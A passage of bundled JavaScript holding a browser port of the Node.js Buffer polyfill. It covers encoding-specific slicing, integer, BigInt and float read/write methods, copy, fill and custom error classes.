            return $51861dfc7ca9d588$var$hexWrite(this, string, offset, length);
        case "utf8":
        case "utf-8":
            return $51861dfc7ca9d588$var$utf8Write(this, string, offset, length);
        case "ascii":
        case "latin1":
        case "binary":
            return $51861dfc7ca9d588$var$asciiWrite(this, string, offset, length);
        case "base64":
            // Warning: maxLength not taken into account in base64Write
            return $51861dfc7ca9d588$var$base64Write(this, string, offset, length);
        case "ucs2":
        case "ucs-2":
        case "utf16le":
        case "utf-16le":
            return $51861dfc7ca9d588$var$ucs2Write(this, string, offset, length);
        default:
            if (loweredCase) throw new TypeError("Unknown encoding: " + encoding);
            encoding = ("" + encoding).toLowerCase();
            loweredCase = true;
    }
};
$51861dfc7ca9d588$var$Buffer.prototype.toJSON = function toJSON() {
    return {
        type: "Buffer",
        data: Array.prototype.slice.call(this._arr || this, 0)
    };
};
function $51861dfc7ca9d588$var$base64Slice(buf, start, end) {
    if (start === 0 && end === buf.length) return $kuxul.fromByteArray(buf);
    else return $kuxul.fromByteArray(buf.slice(start, end));
}
function $51861dfc7ca9d588$var$utf8Slice(buf, start, end) {
    end = Math.min(buf.length, end);
    const res = [];
    let i = start;
    while(i < end){
        const firstByte = buf[i];
        let codePoint = null;
        let bytesPerSequence = firstByte > 0xEF ? 4 : firstByte > 0xDF ? 3 : firstByte > 0xBF ? 2 : 1;
        if (i + bytesPerSequence <= end) {
            let secondByte, thirdByte, fourthByte, tempCodePoint;
            switch(bytesPerSequence){
                case 1:
                    if (firstByte < 0x80) codePoint = firstByte;
                    break;
                case 2:
                    secondByte = buf[i + 1];
                    if ((secondByte & 0xC0) === 0x80) {
                        tempCodePoint = (firstByte & 0x1F) << 0x6 | secondByte & 0x3F;
                        if (tempCodePoint > 0x7F) codePoint = tempCodePoint;
                    }
                    break;
                case 3:
                    secondByte = buf[i + 1];
                    thirdByte = buf[i + 2];
                    if ((secondByte & 0xC0) === 0x80 && (thirdByte & 0xC0) === 0x80) {
                        tempCodePoint = (firstByte & 0xF) << 0xC | (secondByte & 0x3F) << 0x6 | thirdByte & 0x3F;
                        if (tempCodePoint > 0x7FF && (tempCodePoint < 0xD800 || tempCodePoint > 0xDFFF)) codePoint = tempCodePoint;
                    }
                    break;
                case 4:
                    secondByte = buf[i + 1];
                    thirdByte = buf[i + 2];
                    fourthByte = buf[i + 3];
                    if ((secondByte & 0xC0) === 0x80 && (thirdByte & 0xC0) === 0x80 && (fourthByte & 0xC0) === 0x80) {
                        tempCodePoint = (firstByte & 0xF) << 0x12 | (secondByte & 0x3F) << 0xC | (thirdByte & 0x3F) << 0x6 | fourthByte & 0x3F;
                        if (tempCodePoint > 0xFFFF && tempCodePoint < 0x110000) codePoint = tempCodePoint;
                    }
            }
        }
        if (codePoint === null) {
            // we did not generate a valid codePoint so insert a
            // replacement char (U+FFFD) and advance only 1 byte
            codePoint = 0xFFFD;
            bytesPerSequence = 1;
        } else if (codePoint > 0xFFFF) {
            // encode to utf16 (surrogate pair dance)
            codePoint -= 0x10000;
            res.push(codePoint >>> 10 & 0x3FF | 0xD800);
            codePoint = 0xDC00 | codePoint & 0x3FF;
        }
        res.push(codePoint);
        i += bytesPerSequence;
    }
    return $51861dfc7ca9d588$var$decodeCodePointsArray(res);
}
// Based on http://stackoverflow.com/a/22747272/680742, the browser with
// the lowest limit is Chrome, with 0x10000 args.
// We go 1 magnitude less, for safety
const $51861dfc7ca9d588$var$MAX_ARGUMENTS_LENGTH = 0x1000;
function $51861dfc7ca9d588$var$decodeCodePointsArray(codePoints) {
    const len = codePoints.length;
    if (len <= $51861dfc7ca9d588$var$MAX_ARGUMENTS_LENGTH) return String.fromCharCode.apply(String, codePoints) // avoid extra slice()
    ;
    // Decode in chunks to avoid "call stack size exceeded".
    let res = "";
    let i = 0;
    while(i < len)res += String.fromCharCode.apply(String, codePoints.slice(i, i += $51861dfc7ca9d588$var$MAX_ARGUMENTS_LENGTH));
    return res;
}
function $51861dfc7ca9d588$var$asciiSlice(buf, start, end) {
    let ret = "";
    end = Math.min(buf.length, end);
    for(let i = start; i < end; ++i)ret += String.fromCharCode(buf[i] & 0x7F);
    return ret;
}
function $51861dfc7ca9d588$var$latin1Slice(buf, start, end) {
    let ret = "";
    end = Math.min(buf.length, end);
    for(let i = start; i < end; ++i)ret += String.fromCharCode(buf[i]);
    return ret;
}
function $51861dfc7ca9d588$var$hexSlice(buf, start, end) {
    const len = buf.length;
    if (!start || start < 0) start = 0;
    if (!end || end < 0 || end > len) end = len;
    let out = "";
    for(let i = start; i < end; ++i)out += $51861dfc7ca9d588$var$hexSliceLookupTable[buf[i]];
    return out;
}
function $51861dfc7ca9d588$var$utf16leSlice(buf, start, end) {
    const bytes = buf.slice(start, end);
    let res = "";
    // If bytes.length is odd, the last 8 bits must be ignored (same as node.js)
    for(let i = 0; i < bytes.length - 1; i += 2)res += String.fromCharCode(bytes[i] + bytes[i + 1] * 256);
    return res;
}
$51861dfc7ca9d588$var$Buffer.prototype.slice = function slice(start, end) {
    const len = this.length;
    start = ~~start;
    end = end === undefined ? len : ~~end;
    if (start < 0) {
        start += len;
        if (start < 0) start = 0;
    } else if (start > len) start = len;
    if (end < 0) {
        end += len;
        if (end < 0) end = 0;
    } else if (end > len) end = len;
    if (end < start) end = start;
    const newBuf = this.subarray(start, end);
    // Return an augmented `Uint8Array` instance
    Object.setPrototypeOf(newBuf, $51861dfc7ca9d588$var$Buffer.prototype);
    return newBuf;
};
/*
 * Need to make sure that buffer isn't trying to write out of bounds.
 */ function $51861dfc7ca9d588$var$checkOffset(offset, ext, length) {
    if (offset % 1 !== 0 || offset < 0) throw new RangeError("offset is not uint");
    if (offset + ext > length) throw new RangeError("Trying to access beyond buffer length");
}
$51861dfc7ca9d588$var$Buffer.prototype.readUintLE = $51861dfc7ca9d588$var$Buffer.prototype.readUIntLE = function readUIntLE(offset, byteLength, noAssert) {
    offset = offset >>> 0;
    byteLength = byteLength >>> 0;
    if (!noAssert) $51861dfc7ca9d588$var$checkOffset(offset, byteLength, this.length);
    let val = this[offset];
    let mul = 1;
    let i = 0;
    while(++i < byteLength && (mul *= 0x100))val += this[offset + i] * mul;
    return val;
};
$51861dfc7ca9d588$var$Buffer.prototype.readUintBE = $51861dfc7ca9d588$var$Buffer.prototype.readUIntBE = function readUIntBE(offset, byteLength, noAssert) {
    offset = offset >>> 0;
    byteLength = byteLength >>> 0;
    if (!noAssert) $51861dfc7ca9d588$var$checkOffset(offset, byteLength, this.length);
    let val = this[offset + --byteLength];
    let mul = 1;
    while(byteLength > 0 && (mul *= 0x100))val += this[offset + --byteLength] * mul;
    return val;
};
$51861dfc7ca9d588$var$Buffer.prototype.readUint8 = $51861dfc7ca9d588$var$Buffer.prototype.readUInt8 = function readUInt8(offset, noAssert) {
    offset = offset >>> 0;
    if (!noAssert) $51861dfc7ca9d588$var$checkOffset(offset, 1, this.length);
    return this[offset];
};
$51861dfc7ca9d588$var$Buffer.prototype.readUint16LE = $51861dfc7ca9d588$var$Buffer.prototype.readUInt16LE = function readUInt16LE(offset, noAssert) {
    offset = offset >>> 0;
    if (!noAssert) $51861dfc7ca9d588$var$checkOffset(offset, 2, this.length);
    return this[offset] | this[offset + 1] << 8;
};
$51861dfc7ca9d588$var$Buffer.prototype.readUint16BE = $51861dfc7ca9d588$var$Buffer.prototype.readUInt16BE = function readUInt16BE(offset, noAssert) {
    offset = offset >>> 0;
    if (!noAssert) $51861dfc7ca9d588$var$checkOffset(offset, 2, this.length);
    return this[offset] << 8 | this[offset + 1];
};
$51861dfc7ca9d588$var$Buffer.prototype.readUint32LE = $51861dfc7ca9d588$var$Buffer.prototype.readUInt32LE = function readUInt32LE(offset, noAssert) {
    offset = offset >>> 0;
    if (!noAssert) $51861dfc7ca9d588$var$checkOffset(offset, 4, this.length);
    return (this[offset] | this[offset + 1] << 8 | this[offset + 2] << 16) + this[offset + 3] * 0x1000000;
};
$51861dfc7ca9d588$var$Buffer.prototype.readUint32BE = $51861dfc7ca9d588$var$Buffer.prototype.readUInt32BE = function readUInt32BE(offset, noAssert) {
    offset = offset >>> 0;
    if (!noAssert) $51861dfc7ca9d588$var$checkOffset(offset, 4, this.length);
    return this[offset] * 0x1000000 + (this[offset + 1] << 16 | this[offset + 2] << 8 | this[offset + 3]);
};
$51861dfc7ca9d588$var$Buffer.prototype.readBigUInt64LE = $51861dfc7ca9d588$var$defineBigIntMethod(function readBigUInt64LE(offset) {
    offset = offset >>> 0;
    $51861dfc7ca9d588$var$validateNumber(offset, "offset");
    const first = this[offset];
    const last = this[offset + 7];
    if (first === undefined || last === undefined) $51861dfc7ca9d588$var$boundsError(offset, this.length - 8);
    const lo = first + this[++offset] * 256 + this[++offset] * 2 ** 16 + this[++offset] * 2 ** 24;
    const hi = this[++offset] + this[++offset] * 256 + this[++offset] * 2 ** 16 + last * 2 ** 24;
    return BigInt(lo) + (BigInt(hi) << BigInt(32));
});
$51861dfc7ca9d588$var$Buffer.prototype.readBigUInt64BE = $51861dfc7ca9d588$var$defineBigIntMethod(function readBigUInt64BE(offset) {
    offset = offset >>> 0;
    $51861dfc7ca9d588$var$validateNumber(offset, "offset");
    const first = this[offset];
    const last = this[offset + 7];
    if (first === undefined || last === undefined) $51861dfc7ca9d588$var$boundsError(offset, this.length - 8);
    const hi = first * 2 ** 24 + this[++offset] * 2 ** 16 + this[++offset] * 256 + this[++offset];
    const lo = this[++offset] * 2 ** 24 + this[++offset] * 2 ** 16 + this[++offset] * 256 + last;
    return (BigInt(hi) << BigInt(32)) + BigInt(lo);
});
$51861dfc7ca9d588$var$Buffer.prototype.readIntLE = function readIntLE(offset, byteLength, noAssert) {
    offset = offset >>> 0;
    byteLength = byteLength >>> 0;
    if (!noAssert) $51861dfc7ca9d588$var$checkOffset(offset, byteLength, this.length);
    let val = this[offset];
    let mul = 1;
    let i = 0;
    while(++i < byteLength && (mul *= 0x100))val += this[offset + i] * mul;
    mul *= 0x80;
    if (val >= mul) val -= Math.pow(2, 8 * byteLength);
    return val;
};
$51861dfc7ca9d588$var$Buffer.prototype.readIntBE = function readIntBE(offset, byteLength, noAssert) {
    offset = offset >>> 0;
    byteLength = byteLength >>> 0;
    if (!noAssert) $51861dfc7ca9d588$var$checkOffset(offset, byteLength, this.length);
    let i = byteLength;
    let mul = 1;
    let val = this[offset + --i];
    while(i > 0 && (mul *= 0x100))val += this[offset + --i] * mul;
    mul *= 0x80;
    if (val >= mul) val -= Math.pow(2, 8 * byteLength);
    return val;
};
$51861dfc7ca9d588$var$Buffer.prototype.readInt8 = function readInt8(offset, noAssert) {
    offset = offset >>> 0;
    if (!noAssert) $51861dfc7ca9d588$var$checkOffset(offset, 1, this.length);
    if (!(this[offset] & 0x80)) return this[offset];
    return (0xff - this[offset] + 1) * -1;
};
$51861dfc7ca9d588$var$Buffer.prototype.readInt16LE = function readInt16LE(offset, noAssert) {
    offset = offset >>> 0;
    if (!noAssert) $51861dfc7ca9d588$var$checkOffset(offset, 2, this.length);
    const val = this[offset] | this[offset + 1] << 8;
    return val & 0x8000 ? val | 0xFFFF0000 : val;
};
$51861dfc7ca9d588$var$Buffer.prototype.readInt16BE = function readInt16BE(offset, noAssert) {
    offset = offset >>> 0;
    if (!noAssert) $51861dfc7ca9d588$var$checkOffset(offset, 2, this.length);
    const val = this[offset + 1] | this[offset] << 8;
    return val & 0x8000 ? val | 0xFFFF0000 : val;
};
$51861dfc7ca9d588$var$Buffer.prototype.readInt32LE = function readInt32LE(offset, noAssert) {
    offset = offset >>> 0;
    if (!noAssert) $51861dfc7ca9d588$var$checkOffset(offset, 4, this.length);
    return this[offset] | this[offset + 1] << 8 | this[offset + 2] << 16 | this[offset + 3] << 24;
};
$51861dfc7ca9d588$var$Buffer.prototype.readInt32BE = function readInt32BE(offset, noAssert) {
    offset = offset >>> 0;
    if (!noAssert) $51861dfc7ca9d588$var$checkOffset(offset, 4, this.length);
    return this[offset] << 24 | this[offset + 1] << 16 | this[offset + 2] << 8 | this[offset + 3];
};
$51861dfc7ca9d588$var$Buffer.prototype.readBigInt64LE = $51861dfc7ca9d588$var$defineBigIntMethod(function readBigInt64LE(offset) {
    offset = offset >>> 0;
    $51861dfc7ca9d588$var$validateNumber(offset, "offset");
    const first = this[offset];
    const last = this[offset + 7];
    if (first === undefined || last === undefined) $51861dfc7ca9d588$var$boundsError(offset, this.length - 8);
    const val = this[offset + 4] + this[offset + 5] * 256 + this[offset + 6] * 2 ** 16 + (last << 24 // Overflow
    );
    return (BigInt(val) << BigInt(32)) + BigInt(first + this[++offset] * 256 + this[++offset] * 2 ** 16 + this[++offset] * 2 ** 24);
});
$51861dfc7ca9d588$var$Buffer.prototype.readBigInt64BE = $51861dfc7ca9d588$var$defineBigIntMethod(function readBigInt64BE(offset) {
    offset = offset >>> 0;
    $51861dfc7ca9d588$var$validateNumber(offset, "offset");
    const first = this[offset];
    const last = this[offset + 7];
    if (first === undefined || last === undefined) $51861dfc7ca9d588$var$boundsError(offset, this.length - 8);
    const val = (first << 24) + // Overflow
    this[++offset] * 2 ** 16 + this[++offset] * 256 + this[++offset];
    return (BigInt(val) << BigInt(32)) + BigInt(this[++offset] * 2 ** 24 + this[++offset] * 2 ** 16 + this[++offset] * 256 + last);
});
$51861dfc7ca9d588$var$Buffer.prototype.readFloatLE = function readFloatLE(offset, noAssert) {
    offset = offset >>> 0;
    if (!noAssert) $51861dfc7ca9d588$var$checkOffset(offset, 4, this.length);
    return $9NvM5.read(this, offset, true, 23, 4);
};
$51861dfc7ca9d588$var$Buffer.prototype.readFloatBE = function readFloatBE(offset, noAssert) {
    offset = offset >>> 0;
    if (!noAssert) $51861dfc7ca9d588$var$checkOffset(offset, 4, this.length);
    return $9NvM5.read(this, offset, false, 23, 4);
};
$51861dfc7ca9d588$var$Buffer.prototype.readDoubleLE = function readDoubleLE(offset, noAssert) {
    offset = offset >>> 0;
    if (!noAssert) $51861dfc7ca9d588$var$checkOffset(offset, 8, this.length);
    return $9NvM5.read(this, offset, true, 52, 8);
};
$51861dfc7ca9d588$var$Buffer.prototype.readDoubleBE = function readDoubleBE(offset, noAssert) {
    offset = offset >>> 0;
    if (!noAssert) $51861dfc7ca9d588$var$checkOffset(offset, 8, this.length);
    return $9NvM5.read(this, offset, false, 52, 8);
};
function $51861dfc7ca9d588$var$checkInt(buf, value, offset, ext, max, min) {
    if (!$51861dfc7ca9d588$var$Buffer.isBuffer(buf)) throw new TypeError('"buffer" argument must be a Buffer instance');
    if (value > max || value < min) throw new RangeError('"value" argument is out of bounds');
    if (offset + ext > buf.length) throw new RangeError("Index out of range");
}
$51861dfc7ca9d588$var$Buffer.prototype.writeUintLE = $51861dfc7ca9d588$var$Buffer.prototype.writeUIntLE = function writeUIntLE(value, offset, byteLength, noAssert) {
    value = +value;
    offset = offset >>> 0;
    byteLength = byteLength >>> 0;
    if (!noAssert) {
        const maxBytes = Math.pow(2, 8 * byteLength) - 1;
        $51861dfc7ca9d588$var$checkInt(this, value, offset, byteLength, maxBytes, 0);
    }
    let mul = 1;
    let i = 0;
    this[offset] = value & 0xFF;
    while(++i < byteLength && (mul *= 0x100))this[offset + i] = value / mul & 0xFF;
    return offset + byteLength;
};
$51861dfc7ca9d588$var$Buffer.prototype.writeUintBE = $51861dfc7ca9d588$var$Buffer.prototype.writeUIntBE = function writeUIntBE(value, offset, byteLength, noAssert) {
    value = +value;
    offset = offset >>> 0;
    byteLength = byteLength >>> 0;
    if (!noAssert) {
        const maxBytes = Math.pow(2, 8 * byteLength) - 1;
        $51861dfc7ca9d588$var$checkInt(this, value, offset, byteLength, maxBytes, 0);
    }
    let i = byteLength - 1;
    let mul = 1;
    this[offset + i] = value & 0xFF;
    while(--i >= 0 && (mul *= 0x100))this[offset + i] = value / mul & 0xFF;
    return offset + byteLength;
};
$51861dfc7ca9d588$var$Buffer.prototype.writeUint8 = $51861dfc7ca9d588$var$Buffer.prototype.writeUInt8 = function writeUInt8(value, offset, noAssert) {
    value = +value;
    offset = offset >>> 0;
    if (!noAssert) $51861dfc7ca9d588$var$checkInt(this, value, offset, 1, 0xff, 0);
    this[offset] = value & 0xff;
    return offset + 1;
};
$51861dfc7ca9d588$var$Buffer.prototype.writeUint16LE = $51861dfc7ca9d588$var$Buffer.prototype.writeUInt16LE = function writeUInt16LE(value, offset, noAssert) {
    value = +value;
    offset = offset >>> 0;
    if (!noAssert) $51861dfc7ca9d588$var$checkInt(this, value, offset, 2, 0xffff, 0);
    this[offset] = value & 0xff;
    this[offset + 1] = value >>> 8;
    return offset + 2;
};
$51861dfc7ca9d588$var$Buffer.prototype.writeUint16BE = $51861dfc7ca9d588$var$Buffer.prototype.writeUInt16BE = function writeUInt16BE(value, offset, noAssert) {
    value = +value;
    offset = offset >>> 0;
    if (!noAssert) $51861dfc7ca9d588$var$checkInt(this, value, offset, 2, 0xffff, 0);
    this[offset] = value >>> 8;
    this[offset + 1] = value & 0xff;
    return offset + 2;
};
$51861dfc7ca9d588$var$Buffer.prototype.writeUint32LE = $51861dfc7ca9d588$var$Buffer.prototype.writeUInt32LE = function writeUInt32LE(value, offset, noAssert) {
    value = +value;
    offset = offset >>> 0;
    if (!noAssert) $51861dfc7ca9d588$var$checkInt(this, value, offset, 4, 0xffffffff, 0);
    this[offset + 3] = value >>> 24;
    this[offset + 2] = value >>> 16;
    this[offset + 1] = value >>> 8;
    this[offset] = value & 0xff;
    return offset + 4;
};
$51861dfc7ca9d588$var$Buffer.prototype.writeUint32BE = $51861dfc7ca9d588$var$Buffer.prototype.writeUInt32BE = function writeUInt32BE(value, offset, noAssert) {
    value = +value;
    offset = offset >>> 0;
    if (!noAssert) $51861dfc7ca9d588$var$checkInt(this, value, offset, 4, 0xffffffff, 0);
    this[offset] = value >>> 24;
    this[offset + 1] = value >>> 16;
    this[offset + 2] = value >>> 8;
    this[offset + 3] = value & 0xff;
    return offset + 4;
};
function $51861dfc7ca9d588$var$wrtBigUInt64LE(buf, value, offset, min, max) {
    $51861dfc7ca9d588$var$checkIntBI(value, min, max, buf, offset, 7);
    let lo = Number(value & BigInt(0xffffffff));
    buf[offset++] = lo;
    lo = lo >> 8;
    buf[offset++] = lo;
    lo = lo >> 8;
    buf[offset++] = lo;
    lo = lo >> 8;
    buf[offset++] = lo;
    let hi = Number(value >> BigInt(32) & BigInt(0xffffffff));
    buf[offset++] = hi;
    hi = hi >> 8;
    buf[offset++] = hi;
    hi = hi >> 8;
    buf[offset++] = hi;
    hi = hi >> 8;
    buf[offset++] = hi;
    return offset;
}
function $51861dfc7ca9d588$var$wrtBigUInt64BE(buf, value, offset, min, max) {
    $51861dfc7ca9d588$var$checkIntBI(value, min, max, buf, offset, 7);
    let lo = Number(value & BigInt(0xffffffff));
    buf[offset + 7] = lo;
    lo = lo >> 8;
    buf[offset + 6] = lo;
    lo = lo >> 8;
    buf[offset + 5] = lo;
    lo = lo >> 8;
    buf[offset + 4] = lo;
    let hi = Number(value >> BigInt(32) & BigInt(0xffffffff));
    buf[offset + 3] = hi;
    hi = hi >> 8;
    buf[offset + 2] = hi;
    hi = hi >> 8;
    buf[offset + 1] = hi;
    hi = hi >> 8;
    buf[offset] = hi;
    return offset + 8;
}
$51861dfc7ca9d588$var$Buffer.prototype.writeBigUInt64LE = $51861dfc7ca9d588$var$defineBigIntMethod(function writeBigUInt64LE(value, offset = 0) {
    return $51861dfc7ca9d588$var$wrtBigUInt64LE(this, value, offset, BigInt(0), BigInt("0xffffffffffffffff"));
});
$51861dfc7ca9d588$var$Buffer.prototype.writeBigUInt64BE = $51861dfc7ca9d588$var$defineBigIntMethod(function writeBigUInt64BE(value, offset = 0) {
    return $51861dfc7ca9d588$var$wrtBigUInt64BE(this, value, offset, BigInt(0), BigInt("0xffffffffffffffff"));
});
$51861dfc7ca9d588$var$Buffer.prototype.writeIntLE = function writeIntLE(value, offset, byteLength, noAssert) {
    value = +value;
    offset = offset >>> 0;
    if (!noAssert) {
        const limit = Math.pow(2, 8 * byteLength - 1);
        $51861dfc7ca9d588$var$checkInt(this, value, offset, byteLength, limit - 1, -limit);
    }
    let i = 0;
    let mul = 1;
    let sub = 0;
    this[offset] = value & 0xFF;
    while(++i < byteLength && (mul *= 0x100)){
        if (value < 0 && sub === 0 && this[offset + i - 1] !== 0) sub = 1;
        this[offset + i] = (value / mul >> 0) - sub & 0xFF;
    }
    return offset + byteLength;
};
$51861dfc7ca9d588$var$Buffer.prototype.writeIntBE = function writeIntBE(value, offset, byteLength, noAssert) {
    value = +value;
    offset = offset >>> 0;
    if (!noAssert) {
        const limit = Math.pow(2, 8 * byteLength - 1);
        $51861dfc7ca9d588$var$checkInt(this, value, offset, byteLength, limit - 1, -limit);
    }
    let i = byteLength - 1;
    let mul = 1;
    let sub = 0;
    this[offset + i] = value & 0xFF;
    while(--i >= 0 && (mul *= 0x100)){
        if (value < 0 && sub === 0 && this[offset + i + 1] !== 0) sub = 1;
        this[offset + i] = (value / mul >> 0) - sub & 0xFF;
    }
    return offset + byteLength;
};
$51861dfc7ca9d588$var$Buffer.prototype.writeInt8 = function writeInt8(value, offset, noAssert) {
    value = +value;
    offset = offset >>> 0;
    if (!noAssert) $51861dfc7ca9d588$var$checkInt(this, value, offset, 1, 0x7f, -128);
    if (value < 0) value = 0xff + value + 1;
    this[offset] = value & 0xff;
    return offset + 1;
};
$51861dfc7ca9d588$var$Buffer.prototype.writeInt16LE = function writeInt16LE(value, offset, noAssert) {
    value = +value;
    offset = offset >>> 0;
    if (!noAssert) $51861dfc7ca9d588$var$checkInt(this, value, offset, 2, 0x7fff, -32768);
    this[offset] = value & 0xff;
    this[offset + 1] = value >>> 8;
    return offset + 2;
};
$51861dfc7ca9d588$var$Buffer.prototype.writeInt16BE = function writeInt16BE(value, offset, noAssert) {
    value = +value;
    offset = offset >>> 0;
    if (!noAssert) $51861dfc7ca9d588$var$checkInt(this, value, offset, 2, 0x7fff, -32768);
    this[offset] = value >>> 8;
    this[offset + 1] = value & 0xff;
    return offset + 2;
};
$51861dfc7ca9d588$var$Buffer.prototype.writeInt32LE = function writeInt32LE(value, offset, noAssert) {
    value = +value;
    offset = offset >>> 0;
    if (!noAssert) $51861dfc7ca9d588$var$checkInt(this, value, offset, 4, 0x7fffffff, -2147483648);
    this[offset] = value & 0xff;
    this[offset + 1] = value >>> 8;
    this[offset + 2] = value >>> 16;
    this[offset + 3] = value >>> 24;
    return offset + 4;
};
$51861dfc7ca9d588$var$Buffer.prototype.writeInt32BE = function writeInt32BE(value, offset, noAssert) {
    value = +value;
    offset = offset >>> 0;
    if (!noAssert) $51861dfc7ca9d588$var$checkInt(this, value, offset, 4, 0x7fffffff, -2147483648);
    if (value < 0) value = 0xffffffff + value + 1;
    this[offset] = value >>> 24;
    this[offset + 1] = value >>> 16;
    this[offset + 2] = value >>> 8;
    this[offset + 3] = value & 0xff;
    return offset + 4;
};
$51861dfc7ca9d588$var$Buffer.prototype.writeBigInt64LE = $51861dfc7ca9d588$var$defineBigIntMethod(function writeBigInt64LE(value, offset = 0) {
    return $51861dfc7ca9d588$var$wrtBigUInt64LE(this, value, offset, -BigInt("0x8000000000000000"), BigInt("0x7fffffffffffffff"));
});
$51861dfc7ca9d588$var$Buffer.prototype.writeBigInt64BE = $51861dfc7ca9d588$var$defineBigIntMethod(function writeBigInt64BE(value, offset = 0) {
    return $51861dfc7ca9d588$var$wrtBigUInt64BE(this, value, offset, -BigInt("0x8000000000000000"), BigInt("0x7fffffffffffffff"));
});
function $51861dfc7ca9d588$var$checkIEEE754(buf, value, offset, ext, max, min) {
    if (offset + ext > buf.length) throw new RangeError("Index out of range");
    if (offset < 0) throw new RangeError("Index out of range");
}
function $51861dfc7ca9d588$var$writeFloat(buf, value, offset, littleEndian, noAssert) {
    value = +value;
    offset = offset >>> 0;
    if (!noAssert) $51861dfc7ca9d588$var$checkIEEE754(buf, value, offset, 4, 3.4028234663852886e+38, -340282346638528860000000000000000000000);
    $9NvM5.write(buf, value, offset, littleEndian, 23, 4);
    return offset + 4;
}
$51861dfc7ca9d588$var$Buffer.prototype.writeFloatLE = function writeFloatLE(value, offset, noAssert) {
    return $51861dfc7ca9d588$var$writeFloat(this, value, offset, true, noAssert);
};
$51861dfc7ca9d588$var$Buffer.prototype.writeFloatBE = function writeFloatBE(value, offset, noAssert) {
    return $51861dfc7ca9d588$var$writeFloat(this, value, offset, false, noAssert);
};
function $51861dfc7ca9d588$var$writeDouble(buf, value, offset, littleEndian, noAssert) {
    value = +value;
    offset = offset >>> 0;
    if (!noAssert) $51861dfc7ca9d588$var$checkIEEE754(buf, value, offset, 8, 1.7976931348623157E+308, -179769313486231570000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000);
    $9NvM5.write(buf, value, offset, littleEndian, 52, 8);
    return offset + 8;
}
$51861dfc7ca9d588$var$Buffer.prototype.writeDoubleLE = function writeDoubleLE(value, offset, noAssert) {
    return $51861dfc7ca9d588$var$writeDouble(this, value, offset, true, noAssert);
};
$51861dfc7ca9d588$var$Buffer.prototype.writeDoubleBE = function writeDoubleBE(value, offset, noAssert) {
    return $51861dfc7ca9d588$var$writeDouble(this, value, offset, false, noAssert);
};
// copy(targetBuffer, targetStart=0, sourceStart=0, sourceEnd=buffer.length)
$51861dfc7ca9d588$var$Buffer.prototype.copy = function copy(target, targetStart, start, end) {
    if (!$51861dfc7ca9d588$var$Buffer.isBuffer(target)) throw new TypeError("argument should be a Buffer");
    if (!start) start = 0;
    if (!end && end !== 0) end = this.length;
    if (targetStart >= target.length) targetStart = target.length;
    if (!targetStart) targetStart = 0;
    if (end > 0 && end < start) end = start;
    // Copy 0 bytes; we're done
    if (end === start) return 0;
    if (target.length === 0 || this.length === 0) return 0;
    // Fatal error conditions
    if (targetStart < 0) throw new RangeError("targetStart out of bounds");
    if (start < 0 || start >= this.length) throw new RangeError("Index out of range");
    if (end < 0) throw new RangeError("sourceEnd out of bounds");
    // Are we oob?
    if (end > this.length) end = this.length;
    if (target.length - targetStart < end - start) end = target.length - targetStart + start;
    const len = end - start;
    if (this === target && typeof Uint8Array.prototype.copyWithin === "function") // Use built-in when available, missing from IE11
    this.copyWithin(targetStart, start, end);
    else Uint8Array.prototype.set.call(target, this.subarray(start, end), targetStart);
    return len;
};
// Usage:
//    buffer.fill(number[, offset[, end]])
//    buffer.fill(buffer[, offset[, end]])
//    buffer.fill(string[, offset[, end]][, encoding])
$51861dfc7ca9d588$var$Buffer.prototype.fill = function fill(val, start, end, encoding) {
    // Handle string cases:
    if (typeof val === "string") {
        if (typeof start === "string") {
            encoding = start;
            start = 0;
            end = this.length;
        } else if (typeof end === "string") {
            encoding = end;
            end = this.length;
        }
        if (encoding !== undefined && typeof encoding !== "string") throw new TypeError("encoding must be a string");
        if (typeof encoding === "string" && !$51861dfc7ca9d588$var$Buffer.isEncoding(encoding)) throw new TypeError("Unknown encoding: " + encoding);
        if (val.length === 1) {
            const code = val.charCodeAt(0);
            if (encoding === "utf8" && code < 128 || encoding === "latin1") // Fast path: If `val` fits into a single byte, use that numeric value.
            val = code;
        }
    } else if (typeof val === "number") val = val & 255;
    else if (typeof val === "boolean") val = Number(val);
    // Invalid ranges are not set to a default, so can range check early.
    if (start < 0 || this.length < start || this.length < end) throw new RangeError("Out of range index");
    if (end <= start) return this;
    start = start >>> 0;
    end = end === undefined ? this.length : end >>> 0;
    if (!val) val = 0;
    let i;
    if (typeof val === "number") for(i = start; i < end; ++i)this[i] = val;
    else {
        const bytes = $51861dfc7ca9d588$var$Buffer.isBuffer(val) ? val : $51861dfc7ca9d588$var$Buffer.from(val, encoding);
        const len = bytes.length;
        if (len === 0) throw new TypeError('The value "' + val + '" is invalid for argument "value"');
        for(i = 0; i < end - start; ++i)this[i + start] = bytes[i % len];
    }
    return this;
};
// CUSTOM ERRORS
// =============
// Simplified versions from Node, changed for Buffer-only usage
const $51861dfc7ca9d588$var$errors = {};
function $51861dfc7ca9d588$var$E(sym, getMessage, Base) {
    $51861dfc7ca9d588$var$errors[sym] = class NodeError extends Base {
        constructor(){
            super();
            Object.defineProperty(this, "message", {
                value: getMessage.apply(this, arguments),
                writable: true,
                configurable: true
            });
            // Add the error code to the name to include it in the stack trace.
            this.name = `${this.name} [${sym}]`;
            // Access the stack to generate the error message including the error code
            // from the name.
            this.stack // eslint-disable-line no-unused-expressions
            ;
            // Reset the name to the actual name.
            delete this.name;
        }
        get code() {
            return sym;
        }
        set code(value) {
            Object.defineProperty(this, "code", {
                configurable: true,
                enumerable: true,
                value: value,
                writable: true
            });
        }
        toString() {
            return `${this.name} [${sym}]: ${this.message}`;
        }
    };
}
$51861dfc7ca9d588$var$E("ERR_BUFFER_OUT_OF_BOUNDS", function(name) {
    if (name) return `${name} is outside of buffer bounds`;
    return "Attempt to access memory outside buffer bounds";
}, RangeError);
$51861dfc7ca9d588$var$E("ERR_INVALID_ARG_TYPE", function(name, actual) {
    return `The "${name}" argument must be of type number. Received type ${typeof actual}`;
}, TypeError);
$51861dfc7ca9d588$var$E("ERR_OUT_OF_RANGE", function(str, range, input) {
    let msg = `The value of "${str}" is out of range.`;
    let received = input;
    if (Number.isInteger(input) && Math.abs(input) > 2 ** 32) received = $51861dfc7ca9d588$var$addNumericalSeparator(String(input));
    else if (typeof input === "bigint") {
        received = String(input);
        if (input > BigInt(2) ** BigInt(32) || input < -(BigInt(2) ** BigInt(32))) received = $51861dfc7ca9d588$var$addNumericalSeparator(received);
        received += "n";
    }
    msg += ` It must be ${range}. Received ${received}`;
    return msg;
}, RangeError);
function $51861dfc7ca9d588$var$addNumericalSeparator(val) {
    let res = "";
